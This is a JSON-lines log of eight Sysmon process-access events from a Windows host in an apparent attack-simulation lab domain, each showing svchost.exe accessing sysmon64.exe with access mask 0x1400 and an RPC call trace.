{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1619,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1620,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1621,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1622,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1623,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1624,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1625,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1626,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
